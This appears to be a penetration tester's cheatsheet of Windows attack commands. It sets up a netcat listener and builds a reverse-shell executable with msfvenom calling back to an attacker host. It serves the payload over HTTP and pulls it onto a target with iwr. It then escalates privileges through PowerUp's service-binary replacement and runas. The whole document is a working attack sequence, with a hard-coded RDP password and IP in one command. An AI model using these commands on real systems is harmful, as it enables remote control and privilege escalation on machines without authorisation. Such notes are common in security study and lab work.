# Quality of Life Cheatsheet

========================================================================================
Upgrade Windows Dumb Shell
rlwrap listener
rlwrap nc -lvp 4242

Create Stageless Windows Rev shell Payload
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER> LPORT=4242 -f exe > reverse.exe

python http server
python3 -m http.server 80

upload it
iwr -uri http://<ATTACKER>/reverse.exe -Outfile rev.exe

========================================================================================
Powerup
Upload it
iwr -uri http://<ATTACKER>/reverse.exe -Outfile rev.exe

RDP in
xfreerdp /u:admin /p:'mypassword' /v:'192.168.208.220' /cert-ignore /w:1366 /h:768

NOTE:  must be rdp session
Get-ModifiableServiceFile
or
$ModifiableFiles = echo 'C:\xampp\mysql\bin\mysqld.exe' | Get-ModifiablePath -Literal
$ModifiableFiles

# Attempt exploit
Install-ServiceBinary -Name 'mysql'

#Login
runas /user:john "cmd.exe"

#Elevate prompt (john may be part of admin, but if he's in a regular session he wont have permission to do stuff)
powershell -Command "Start-Process cmd -Verb RunAs"


